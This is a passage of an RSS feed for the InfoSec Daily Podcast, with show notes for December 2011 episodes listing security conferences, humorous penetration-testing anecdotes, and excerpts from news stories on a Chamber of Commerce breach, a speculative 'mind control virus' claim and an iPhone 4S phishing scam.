	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Unannouced</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Los Angeles area</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest Lessons:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adam Compton &amp; Zac Wagle&#39;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account: </span><a href="https://twitter.com/pentestlessons"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/pentestlessons</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Don&#39;t blindly follow the intern&#39;s suggestions.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Don&#39;t enable the firewall on a host you&#39;ve compromised without first checking the rules to see if you&#39;re going to block your own connection to the host.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Backstory:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> They popped a box via ColdFusion vuln and ran into an issue that required some network troubleshooting. The intern suggested turning on the firewall so they could use the logging to troubleshoot. They turn on the firewall and POP! No more connection. In addition, port 80 got blocked, so the customer&#39;s site went down as well. They had to call the customer to get the firewall turned back off.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Don&#39;t scan Polycom VOIP phones&#39; embedded web server with a web scanner or vulnerability scanner with web checks enabled. You will reboot every phone. The federal contractor I was working for had executives in all day conference calls with their government clients. Their conference calls were rudely cut short.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 4:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Your company&rsquo;s network is most secure when all of the employees are on vacation.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 5: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Do not copy content from one pentest report to another. Saving 10 minutes is not worth getting fired.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 6: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Do not copy a PDF from an OpenOffice Word to an Office XP into an Office 2011. Its hell to read for anyone else, and crashes systems. </span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://online.wsj.com/article/SB10001424052970204058404577110541568535300.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://online.wsj.com/article/SB10001424052970204058404577110541568535300.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In Beijing, Foreign Ministry spokesman Liu Weimin said at a daily briefing that he hadn&#39;t heard about the matter, though he repeated that Chinese law forbids hacker attacks. He added that China wants to cooperate more with the international community to prevent hacker attacks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Chamber moved to shut down the hacking operation by unplugging and destroying some computers and overhauling its security system. The security revamp was timed for a 36-hour period over one weekend when the hackers, who kept regular working hours, were expected to be off duty.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Damage from data theft is often difficult to assess.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">People familiar with the Chamber investigation said it has been hard to determine what was taken before the incursion was discovered, or whether cyberspies used information gleaned from the Chamber to send booby-trapped emails to its members to gain a foothold in their computers, too.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Chamber officials said they scoured email known to be purloined and determined that communications with fewer than 50 of its members were compromised. They notified those members. People familiar with the investigation said the emails revealed the names of companies and key people in contact with the Chamber, as well as trade-policy documents, meeting notes, trip reports and schedules. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.msfn.org/_/security/hackers-may-develop-a-computer-virus-to-infe-r8865?"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.msfn.org/_/security/hackers-may-develop-a-computer-virus-to-infe-r8865?</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Synthetic biology&quot; is accelerating &quot;faster than computer technology&quot;, say experts who have warned that hackers could someday use it to develop a computer virus to bend human minds.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Andrew Hessel of Singularity University on US space agency NASA&#39;s research campus, &quot;It could lead to a world where hackers could engineer viruses or bacteria to control human minds.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This is one of the most powerful technologies in the world. Synthetic biology &#8212; the writing of life. I advocate cells are living computers and DNA is a programming language.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;I want to see life programmed and used to solve global challenges so that humanity can achieve a sustainable relationship within the biosphere. It&#39;s growing fast. It will grow faster than computer technologies.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He predicts a world where people can &quot;print&quot; DNA, and even &quot;decode&quot; it. But he warned that viruses and bacteria send chemicals into human brains and could someday be used to influence, or even &quot;control&quot; people, &#39;Daily Mail&#39; reported.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A literal virus &#8212; injected into a &quot;host&quot; in the guise of a vaccine, say &#8212; could be used to control behaviour, says Hessel who warns people &quot;may&#39;ve to learn how to counterattack&quot; against such weapons.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://blog.trendmicro.com/seasons-warnings-iphone-4s-scam-and-other-holiday-threats"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.trendmicro.com/seasons-warnings-iphone-4s-scam-and-other-holiday-threats</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Looking for cheaper iPhone 4S this holiday season? Be wary, because cybercriminals can trick you into giving out your online financial credentials. We&rsquo;ve recently found a phishing attack that specifically targets users who are out to purchase an iPhone 4S through eBay.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attack involves domains that display replicated eBay posts for iPhone 4S units. The screenshots below show a sample of the fake page, and the original eBay post from which the content was copied.</span><img height="267px;" src="https://lh4.googleusercontent.com/5Ry1y6eaBhOgZMjbzNAdRgSCpfyivhfqamU7txnwsazhNW8ZWQO7XptRrXBgH_4RSIr8lefnHeQXjdMAfOHaJZhSAEGWQZaFwhAubaMYoWktYNG3zKI" width="381px;" /></p>
<div dir="ltr">
<table style="border:none;border-collapse:collapse">
<colgroup>
<col width="389" />
<col width="170" /></colgroup>
</table>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-551-pentest-lessons-china-hacks-your-thermostat-mind-control-virus-cheap-iphones-gps-spoofing/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3295/0/infosec-daily-podcast-episode-551.mp3" length="20616190" type="audio/mpeg" />
		<itunes:duration>0:42:54</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 551 for December 21, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;Hi[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 551 for December 21, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	LayerOne
	When: May 26-27, 2012
	Where: Unannouced
	Los Angeles area
	http://www.layerone.org/
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons:
	Adam Compton &#38; Zac Wagle&#39;s should get credit for the &#34;Pentest Lessons&#34; idea. They also started a twitter account: https://twitter.com/pentestlessons. 
	Lesson 1: Don&#39;t blindly follow the intern&#39;s suggestions.
	Lesson 2: Don&#39;t enable the firewall on a host you&#39;ve compromised without first checking the rules to see if you&#39;re going to block your own connection to the host.
	Backstory: They popped a box via ColdFusion vuln and ran into an issue that required some network troubleshooting. The intern suggested turning on the firewall so they could use the logging to troubleshoot. They turn on the firewall and POP! No more connection. In addition, port 80 got blocked, so the customer&#39;s site went down as well. They had to call the customer to get the firewall turned back off.
	Lesson 3: Don&#39;t scan Polycom VOIP phones&#39; embedded web server with a web scanner or vulnerability scanner with web checks enabled. You will reboot every phone. The federal contractor I was working for had executives in all day conference calls with their government clients. Their conference calls were rudely cut short.
	Lesson 4: Your company&#8217;s network is most secure when all of the employees are on vacation.
	Lesson 5: Do not copy content from one pentest report to another. Saving 10 minutes is not worth getting fired.
	Lesson 6: Do not copy a PDF from an OpenOffice Word to an Office XP into an Office 2011. Its hell to read for anyone else, and crashes systems. 
	&#160;
Stories
Source: http://online.wsj.com/article/SB10001424052970204058404577110541568535300.html
	In Beijing, Foreign Ministry spokesman Liu Weimin said at a daily briefing that he hadn&#39;t heard about the matter, though he repeated that Chinese law forbids hacker attacks. He added that China wants to coope[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 550 &#8211; Armitage Easy, Android Shell, Unfollow, Manning Update, Nothing, Windows 7 0-day &amp; MIT CryptDB</title>
		<link>http://www.isdpodcast.com/episode-550-armitage-easy-android-shell-unfollow-manning-update-nothing-windows-7-0-day-mit-cryptdb</link>
		<comments>http://www.isdpodcast.com/episode-550-armitage-easy-android-shell-unfollow-manning-update-nothing-windows-7-0-day-mit-cryptdb#comments</comments>
		<pubDate>Wed, 21 Dec 2011 01:55:18 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3291</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 550 for December 20, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Themson Mester. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 550 for December 20, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Themson Mester.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
